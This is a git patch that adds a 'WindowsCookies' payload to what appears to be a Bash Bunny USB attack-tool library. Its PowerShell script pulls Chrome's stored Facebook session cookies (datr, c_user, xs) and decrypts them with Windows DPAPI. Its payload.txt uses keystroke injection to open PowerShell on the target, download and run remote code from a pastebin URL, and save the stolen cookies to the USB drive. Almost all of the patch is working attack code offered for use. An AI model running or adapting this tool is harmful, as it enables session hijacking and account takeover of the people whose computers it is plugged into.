From 1ecaddbf55c68a1608b4a6919515a63957843cdc Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:59:11 +0000 Subject: [PATCH] add WindowsCookies payload --- payloads/library/WindowsCookies/README.md | 18 +++++ .../WindowsCookies/get_facebook_cookies.ps1 | 65 +++++++++++++++++++ payloads/library/WindowsCookies/payload.txt | 48 ++++++++++++++ 3 files changed, 131 insertions(+) create mode 100644 payloads/library/WindowsCookies/README.md create mode 100644 payloads/library/WindowsCookies/get_facebook_cookies.ps1 create mode 100644 payloads/library/WindowsCookies/payload.txt diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md new file mode 100644 index 00000000..ed037be7 --- /dev/null +++ b/payloads/library/WindowsCookies/README.md @@ -0,0 +1,18 @@ +# WindowsCookies for Bash Bunnys + +Author: oXis +Version: Version 1.0 +Credit: illwill, sekirkity, EmpireProject + +## Description + +Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession +Only works for Chrome on Windows. Tested on two different Windows 10 machines. +Only payload.txt is required, powershell script is here only if you want to modify it. + +## Payload LED STATUS + +| LED | Status | +| ---------------- | -------------------------------------- | +| Blue (blinking) | Payload init | +| Purple (blinking)| Done | diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 new file mode 100644 index 00000000..8233e8b6 --- /dev/null +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 @@ -0,0 +1,65 @@ +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "datr is $DecPwd" + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "c_user is $DecPwd" + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "xs is $DecPwd" +} + +Get-FacebookCreds \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt new file mode 100644 index 00000000..0e0a7281 --- /dev/null +++ b/payloads/library/WindowsCookies/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: Facebook session cookies dump +# Author: oXis (inspired by illwill) +# Version: 1.0 +# +# Dumps the stored session cookies from Chrome browser by downloading a Powershell script +# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName% +# Credits to these guys for their powershell scripts: +# https://github.com/sekirkity/BrowserGather BrowserGather.ps1 +# https://github.com/EmpireProject/Empire Get-FoxDump.ps1 +# Also credit to illwill for the BrowerCreds payload + +#script +# Blue...............Running Script +# Purple.............Got Browser Creds + +# QUACK SET_LANGUAGE gb +#DUCKY_LANG='fr' + +LED R 200 +LOOTDIR=/root/udisk/loot/FacebookSession +mkdir -p $LOOTDIR + +ATTACKMODE HID STORAGE +LED B 200 + +# wait 6 seconds for the storage to popup +Q DELAY 6000 +Q GUI r +Q DELAY 100 +Q STRING POWERSHELL +Q ENTER +Q DELAY 500 +Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) +Q ENTER +Q DELAY 100 + +#Dump Chrome Creds +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q ENTER +Q DELAY 100 +Q STRING exit +Q ENTER +Q DELAY 2000 + +sync +LED R B 200 \ No newline at end of file